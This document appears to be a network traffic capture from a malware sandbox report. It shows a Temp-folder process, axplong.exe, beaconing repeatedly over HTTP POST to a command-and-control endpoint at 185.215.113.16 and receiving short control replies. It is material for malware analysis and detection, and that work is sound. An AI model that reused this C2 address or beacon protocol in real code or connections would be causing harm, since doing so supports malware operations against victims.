                    30192.168.2.749737185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:36.946696043 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:37.658889055 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:37.659717083 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:37.890383005 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.749738185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:38.012145996 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:38.738380909 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:38.795332909 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:39.019455910 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.749739185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:39.189030886 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:39.890763044 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:39.892138958 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:40.119652033 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.749740185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:40.227973938 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:40.935679913 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:40.936345100 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:41.162904024 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.749741185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:41.278381109 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:41.972136974 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:41.973299026 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:42.197624922 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.749742185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:42.306026936 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:43.004071951 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:43.004837990 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:43.229008913 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.749743185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:43.337554932 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:44.065453053 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:44.066224098 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:44.306499958 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.749744185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:44.415405035 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:45.108756065 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:45.110018969 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:45.394546986 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 01:29:45.621578932 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.749745185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:45.623291969 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:46.332021952 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:46.332782030 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:46.561079979 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.749746185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:46.680819035 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:47.392909050 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:47.393826008 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:47.619889021 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.749747185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:47.729902983 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:48.442359924 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:48.455399990 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:48.859441042 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.749748185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:48.979027033 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:49.678456068 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:49.679280043 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
